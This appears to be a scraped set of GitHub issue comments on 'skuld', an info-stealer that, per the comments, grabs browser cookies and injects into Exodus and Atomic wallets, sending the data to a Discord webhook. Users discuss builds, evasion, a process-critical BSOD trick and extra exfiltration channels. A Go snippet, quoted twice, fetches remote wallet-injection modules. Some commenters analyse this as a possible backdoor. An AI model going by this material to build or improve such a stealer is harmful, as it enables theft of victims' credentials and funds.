hackirby / skuld Goto Github PK

Describe the bug
A clear and concise description of what the bug is.

Creating a webhook to log the use of this with will get you permanently disabled from discord after some time.

To Reproduce
Steps to reproduce the behavior:

1. Install it on a device
2. Create a discord server and webhook
3. Wait a while (a week or two)
4. See the server has been randomly deleted
5. Enjoy your permanent ban

Expected behavior
not being banned

Screenshots
If applicable, add screenshots to help explain your problem.

Desktop
Same Process

Additional context
The ban reason is for malicious conduct. This is unsafe to make on a server on an account you care about , so take into consideration you must use alts. The server was also inactive for a while before this happened aswell.

i download a program from YouTube, and it got detected out by AV. did some analysis on the dropped exe, did some searching and came here. some skid took your program to hack people with it...

it is also got featured on the hacker news so more and more idiots will be using this

Allow to turn on/off Features

not working

When I follow instructions with git and command after config main.go and nothing work 🤷🏼‍♂️

Can i add soon feature like setting process as critical ->
if someone tries to delete it or crash it in nutshell they wouldnt be able to beacuse if the process is in critical state and they try to kill it, it will bsod lol.

now defender is dedected

The way it loads those external ASAR modules (60MB/120MB) suggests a potential backdoor. It’s hard to know what’s happening inside those modules, so be cautious.

Go

walletsinjection.Run(
"https://github.com/hackirby/wallets-injection/raw/main/atomic.asar",
"https://github.com/hackirby/wallets-injection/raw/main/exodus.asar",
CONFIG["webhook"].(string),
)

These modules are fetched dynamically when the code runs.

The problem is, there are no actual files there. When you clone the repo and check the module, you get:

[user@dev-tools wallets-injection]$ cat exodus.asar
version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162

The exodus.asar file you’re seeing is a pointer file. It contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored.

The issue is that this reference:

sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6

can be changed at any time by force-pushing to the repo at https://github.com/hackirby/wallets-injection.

Dates can be faked, so you’ll never know when it was actually changed. It says it was last changed 7 months ago, but it could have been altered at any time.

Quite the scheme!

Is your feature request related to a problem? Please describe.
A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]

Describe the solution you'd like
A clear and concise description of what you want to happen.

Describe alternatives you've considered
A clear and concise description of any alternative solutions or features you've considered.

Additional context
Add any other context or screenshots about the feature request here.

• Mutex (single instance) to ensure that only one instance of the app is active at any given time.

Advantages

• Thread-Safety
• Synchronization
• Prevention of Deadlocks
• Flexibility

Basically i just need help with the "go build -ldflags "-s -w"" i dont know what to put as the -s and -w
Help would be much appreciated

webhook correct i compiled ran it nothing happened ran in console didnt print any logs or error n i tried without any flags and it still just does nothing

Hello,

I was trying to find the injection added on the Atomic wallet but i am unable to, i downloaded and unpacked it and searched everywhere and was not able to find it. ( Exodus Injection was there and easy to find but Atomic had a diff story )

I am creating this issue just for transparancy as i dont like running things that aren't open sourced and would like the check the injection code on the atomic wallet if that is okay.

Can you please walk me through on where exacly can i find it after unpacking the app.asar file ?

Thank you and keep up the good work.

likely backdoored with the way it loads those external asar modules that are 60bs/120mbs. it is hard to have a clue what could be happening inside those modules. be wary.

	go walletsinjection.Run(
		"https://github.com/hackirby/wallets-injection/raw/main/atomic.asar",
		"https://github.com/hackirby/wallets-injection/raw/main/exodus.asar",
		CONFIG["webhook"].(string),
	)

Those modules are fetched dynamically when you run the code.

Problem is, there is no files there. When you git clone this repo and cat the module you get:

[user@dev-tools wallets-injection]$ cat exodus.asar 
version https://git-lfs.github.com/spec/v1
oid sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6
size 132486162

The exodus.asar file you're seeing is one of these pointer files. It's a small text file that contains metadata about the actual large file, including its size, a unique identifier (oid), and the URL of the LFS server where the actual file content is stored (version https://git-lfs.github.com/spec/v1).

Problem is this reference

sha256:d19109209ffc7b8b286eec3574a2634e9611f8d5431f1c87fb99fccd315772b6

Can be changed at any given time by git pushing -f the repo at https://github.com/hackirby/wallets-injection

Dates can be faked so you will never know when it was changed, it can be changed any given day, commit date can be modified. Now it says it was last changed 7 months ago, but truth is it could've been changed at any time.

Nice scheme though!

could i update the antidbg? and add some features to the antidbg

Where tf does it build, also how do i know if its built or no

I've done this on Virtual Machines, with separate settings and environments of their own, yet I've seen one glaring problem.

Firefox seems to be the only browser that actually works regarding cookies. My guess, is, that the Chromium (and Chrome) have added their LDB file lock, which meant cookies wouldn't be grabbed if chrome was on.

But, even after chrome is killed, it does not grab anything. I'm sure their LDB lock fails once the browser itself is killed, so I'm guessing it's an issue with the code.

Given your grabber is quite damn good, I'd also imagine it'd attract a bit of attention. This may need urgent fixing, if the issue persists across multiple users.

i run the go build -ldflags "-s -w -H=windowsgui" command and i get the exe, but when i run it nothing happens.

nice to see that all the new types of stealers out there are using my project for anti-vm-blacklist

Good stealer btw.

it removed my fucking cmd and tskmngr fuc# you with your dirty life

Maybe you can think of these features

First of all, Amazing code, i like it.
and i wanted to suggest it would be really great and convinent if data could be also sent via SMTP(Gmail) or Telegram which is a safer and more easier way than discord.